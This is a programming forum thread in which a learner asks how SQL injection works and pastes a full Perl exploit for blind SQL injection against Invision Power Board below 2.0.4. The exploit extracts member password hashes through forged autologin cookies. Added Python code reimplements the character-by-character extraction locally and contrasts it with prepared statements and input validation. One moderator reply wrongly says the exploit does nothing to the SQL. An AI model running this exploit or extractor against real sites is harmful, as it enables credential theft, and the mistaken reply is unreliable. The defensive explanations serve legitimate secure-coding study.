
Web security


7 replies to this topic

#1 VakhoQ (Programmer; Members; 127 posts)
We know that if we want to make a good web page, we should make it secure. I only know about XSS and SQL injection attacks. OK, we know that if we want security against injection we should use mysql_real_escape_string() or preg_match(), or we can also use .htaccess. But I've just seen an SQL injection exploit for the IPB forum. It's hard to believe that the IPB creators don't use the escape string function. How can hackers take information from SQL? I don't know; I need answers. And is there any other way to break a web page? I want to know about the bugs, to create a good web page. Also, generally, I'm going to learn ASP.NET. Is MSSQL with ASP safer? What do you think about this?

For example, the SQL exploit:


#!/usr/bin/perl
# r57ipb2.pl - blind SQL injection through the IPB autologin cookie (see usage() below).
# Perl as posted in the thread; the only repair is the missing IO::Socket::INET import,
# without which the script dies at the first request.
use IO::Socket::INET;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

# IPB 2.x keeps the autologin secret in member_login_key, IPB 1.x in password
$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;   # position inside the hash currently being recovered
$|++;         # unbuffered STDOUT so the spinner redraws
$n = 0;       # number of HTTP requests sent so far

print "[~]      SERVER : $server\r\n";
print "[~]        PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]      TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

# URL-encode every byte of the member id for use in the cookie
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

# Main loop: one character per iteration. The digit range (ASCII 47-58) is tried
# first, then lowercase letters (96-122); a result of 0 means nothing matched,
# i.e. the end of the hash has been reached.
while(1)
{
  if(&found(47,58)==0) { &found(96,122); }
  $char = $i;
  if ($char=="0")
  {
    if(length($allchar) > 0){
      print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
      print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
      print $allchar."\r\n";
    }
    else
    {
      print "\b\b FAILED ]";
    }
    exit();
  }
  else
  {
    $allchar .= chr(42);   # as posted: appends '*' per recovered position; the ASCII value itself is in $char
  }
  $s_num++;
}

# Binary search over the ASCII value using BETWEEN; once the window is narrower
# than 5 it hands over to crack(). The result is left in the global $i.
sub found($$)
{
  my $fmin = $_[0];
  my $fmax = $_[1];
  if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
  $r = int($fmax - ($fmax-$fmin)/2);
  $check = " BETWEEN $r AND $fmax";
  if ( &check($check) ) { &found($r,$fmax); }
  else { &found($fmin,$r); }
}

# Linear probe with '=' across a small window; returns the ASCII value or 0
sub crack($$)
{
  my $cmin = $_[0];
  my $cmax = $_[1];
  $i = $cmin;
  while ($i<$cmax)
  {
    $crcheck = "=$i";
    if ( &check($crcheck) ) { return $i; }
    $i++;
  }
  $i = 0;
  return $i;
}

# Send one probe. The injected pass_hash cookie decodes to
#   666' OR (id=<member_id> AND ascii(substring(<column>,<pos>,1)) <condition>) /*
# and a response carrying "Set-Cookie: session_id=0;" marks the condition as true.
sub check($)
{
  $n++;
  status();
  $ccheck = $_[0];
  $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";                           # 666%27 OR (id=
  $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";  #  AND ascii(substring(
  $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
  $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";   # filler appended after the SQL comment opener
  $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

  printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
    $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

  while(<$socket>)
  {
    if (/Set-Cookie: session_id=0;/) { return 1; }
  }
  return 0;
}

# Progress spinner, advanced once per request
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
{
  print q(
 Invision Power Board v < 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
                  0 - IPB 1.*
                  1 - IPB 2.* (Prior To 2.0.4)
 );
  exit();
}


Edited by VakhoQ, 17 March 2011 - 07:43 AM.

GNU/Linux Is the Best.
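What the script above is actually doing, as an added example that is not part of the original post: the same BETWEEN/= binary search, replayed in Python against a constructed in-memory SQLite table that stands in for the IPB members table. The table, its rows, the hash strings and the vulnerable_autologin()/safe_autologin() functions are assumptions made for the demo; ascii() and substring() exist natively in MySQL but not in SQLite, so they are registered as shims so the payload can be used unchanged. safe_autologin() is the parameterised counterpart, against which every probe comes back false.

```python
"""Blind boolean SQL injection, the way r57ipb2.pl does it, replayed locally.

Added example (not from the original post). The members table, its rows, the
hash strings and the vulnerable/safe login functions are constructed for the
demo; ascii()/substring() are MySQL functions registered here as shims so the
payload can be used unchanged against SQLite.
"""
import sqlite3

# Constructed stand-in rows; the "hashes" are arbitrary hex strings.
SEED_ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "vakho", "0cc175b9c0f1b6a831c399e269772661"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.execute("CREATE TABLE members (id INTEGER, name TEXT, member_login_key TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def vulnerable_autologin(conn, member_id, pass_hash):
    """The bug class the exploit relies on: cookie values pasted into the SQL."""
    sql = ("SELECT id FROM members WHERE id=" + member_id
           + " AND member_login_key='" + pass_hash + "'")
    return conn.execute(sql).fetchone() is not None  # True/False is the oracle


def safe_autologin(conn, member_id, pass_hash):
    """Parameterised form: the payload is compared as data and matches nothing."""
    sql = "SELECT id FROM members WHERE id=? AND member_login_key=?"
    return conn.execute(sql, (member_id, pass_hash)).fetchone() is not None


def extract(oracle, member_id, column, ranges=((47, 58), (96, 122))):
    """Recover `column` for `member_id` one character at a time.

    Mirrors the Perl script: found() halves the ASCII window with BETWEEN until
    it is narrower than 5, crack() then probes with '='; 0 means no character
    matched, which ends the loop. Returns (value, number_of_requests).
    """
    requests = 0

    def check(pos, cond):
        nonlocal requests
        requests += 1
        payload = (f"666' OR (id={member_id} AND "
                   f"ascii(substring({column},{pos},1)){cond}) /*")
        return oracle(str(member_id), payload)

    def crack(pos, cmin, cmax):
        for i in range(cmin, cmax):          # Perl: while ($i < $cmax)
            if check(pos, f"={i}"):
                return i
        return 0

    def found(pos, fmin, fmax):
        if fmax - fmin < 5:
            return crack(pos, fmin, fmax)
        r = int(fmax - (fmax - fmin) / 2)
        if check(pos, f" BETWEEN {r} AND {fmax}"):
            return found(pos, r, fmax)
        return found(pos, fmin, r)

    recovered = []
    pos = 1
    while True:
        code = 0
        for lo, hi in ranges:
            code = found(pos, lo, hi)
            if code:
                break
        if not code:
            break
        recovered.append(chr(code))
        pos += 1
    return "".join(recovered), requests


if __name__ == "__main__":
    db = build_db()
    value, n = extract(lambda m, h: vulnerable_autologin(db, m, h), 2, "member_login_key")
    print(f"vulnerable query: recovered {value!r} in {n} requests")
    value, n = extract(lambda m, h: safe_autologin(db, int(m), h), 2, "member_login_key")
    print(f"parameterised query: recovered {value!r} in {n} requests")
```

Each request answers one yes/no question, so a 32-character hex hash costs a few hundred requests rather than a brute force over the hash space; the server never returns the hash, only whether a login attempt with the crafted cookie succeeded. The parameterised version turns the whole payload into a literal string to compare against, so the search returns nothing after the ten probes it takes to exhaust both character ranges at position 1.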

#2 Orjan (Writes binary right handed and hex left handed; Moderators; 3,299 posts; Location: Karlstad, Sweden; Programming Language: C, Java, C++, C#, PHP, JavaScript, Pascal; Learning: Java, C#)
The language itself isn't safer; it's only about how you use the language. Some languages could have easier or better security functions, but they still need to be used.
__________________________________________
I study Information Systems at Karlstad University when I'm not on CodeCall

#3 Alexander (It's Science!; Moderators; 4,124 posts; Location: Vancouver, Eh! Cleverness: 200)
Changing the language does not hide security issues automatically; you still have to use prepared statements directly with the MSSQL driver in ASP.NET, which you can do just as easily in PHP with PDO or MySQLi to avoid SQL injection.

Further, your code does not do anything to the SQL. It sends the server a user session hash and password hash which the author happened to leave vulnerable to help with logging in. I have not seen somebody do something like this before, so it is not some "crazy" security risk you should change languages for.
Be sure to read the updated FAQ! || Health is achieved through the same 10,000 steps.
If a suggested code/method fails, informing us is less important than telling us why or what errors occurred.

#4 VakhoQ (Programmer; Members; 127 posts)

Alexander said:

Further, your code does not do anything to the SQL. It sends the server a user session hash and password hash which the author happened to leave vulnerable to help with logging in. I have not seen somebody do something like this before

That's interesting... Could you give me an example of this? Or do you know any books or tutorials on this session?

#5 VakhoQ (Programmer; Members; 127 posts)
I have this question too:
If I only use mysql_real_escape_string() and preg_match(), then you can't do injection through the URL. OK. But could you write an SQL exploit in Perl? That's interesting. I need a definite answer: can somebody write a Perl exploit when I only use the escape string function? :huh:
Thanks :)


#6 VakhoQ (Programmer; Members; 127 posts)
Is there any other advice? :)

#7 Alexander (It's Science!; Moderators; 4,124 posts; Location: Vancouver, Eh! Cleverness: 200)
Perl is just a text processing language that may or may not make writing an automated exploit easier (for example, you could deploy and run the script from the command line in a simple fashion, maybe without scripting plugins, which you may not be able to do with other scripting languages).

In your original question: if you escape or filter all data (sanitization) you should be safe. If you are very concerned, then try using PDO or MySQLi prepared statements, where injections are meaningless to your database and you do not even need to escape! (with precaution)

Again, the Perl exploit you mentioned has nothing to do with Perl itself and can be done in any language, and it exploits something that I doubt you will ever write (it is very specific).
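A concrete check on the escaping advice in the post above, as an added example that is not from the original thread: an escape function only protects a value that ends up inside a quoted string literal. The r57ipb2.pl payload in post #1 opens with 666' precisely to close the quotes around pass_hash, so quoting plus escaping defeats it; an id dropped into WHERE id=$id without quotes needs no quote at all, and the escape function passes 2 OR 1=1 through untouched. The table, rows and lookup functions are constructed for the demo; escape_string() doubles single quotes (SQLite's convention, standing in for mysql_real_escape_string() because the demo runs on SQLite), is_valid_id() is the preg_match()-style allow-list mentioned in post #1, and lookup_by_id_param() is the prepared-statement form.

```python
"""Why escaping alone is not enough: it only covers quoted string contexts.

Added example, not from the original thread. Table, rows and lookup functions
are constructed for the demo; escape_string() uses SQLite's quote doubling in
place of mysql_real_escape_string() because the demo runs on SQLite.
"""
import re
import sqlite3

# Constructed rows; the keys are placeholders.
SEED_ROWS = [(1, "admin", "k-admin"), (2, "vakho", "k-vakho"), (3, "guest", "k-guest")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, name TEXT, member_login_key TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def escape_string(value):
    """Make `value` safe *inside* single quotes by doubling any quote in it."""
    return value.replace("'", "''")


def is_valid_id(value):
    """preg_match('/^[0-9]+$/')-style allow-list for numeric ids."""
    return re.fullmatch(r"[0-9]+", value) is not None


def lookup_by_name(conn, name):
    """Quoted string context: escaping works, the literal cannot be closed early."""
    sql = f"SELECT id, name FROM members WHERE name='{escape_string(name)}'"
    return conn.execute(sql).fetchall()


def lookup_by_id_escaped(conn, member_id):
    """Numeric context: nothing to break out of, so escaping changes nothing."""
    sql = f"SELECT id, name FROM members WHERE id={escape_string(member_id)}"
    return conn.execute(sql).fetchall()


def lookup_by_id_validated(conn, member_id):
    """Allow-list first: anything that is not all digits never reaches the SQL."""
    if not is_valid_id(member_id):
        return []
    return conn.execute(f"SELECT id, name FROM members WHERE id={member_id}").fetchall()


def lookup_by_id_param(conn, member_id):
    """Prepared statement: the value is bound as data, never spliced into the SQL."""
    return conn.execute("SELECT id, name FROM members WHERE id=?", (member_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("name, escaped :", lookup_by_name(db, "admin' OR '1'='1"))
    print("id, escaped   :", lookup_by_id_escaped(db, "2 OR 1=1"))
    print("id, validated :", lookup_by_id_validated(db, "2 OR 1=1"))
    print("id, bound     :", lookup_by_id_param(db, "2 OR 1=1"))
```

The escaped name lookup with a quote-smuggling input returns no rows, while the escaped id lookup with 2 OR 1=1 returns the whole table: same escape function, different context. The allow-list and the bound parameter both reject it, and the bound form has the advantage that it needs no per-field reasoning about which context the value lands in.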

#8 VakhoQ (Programmer; Members; 127 posts)
Alexander, thanks. Your answer is wonderful :)
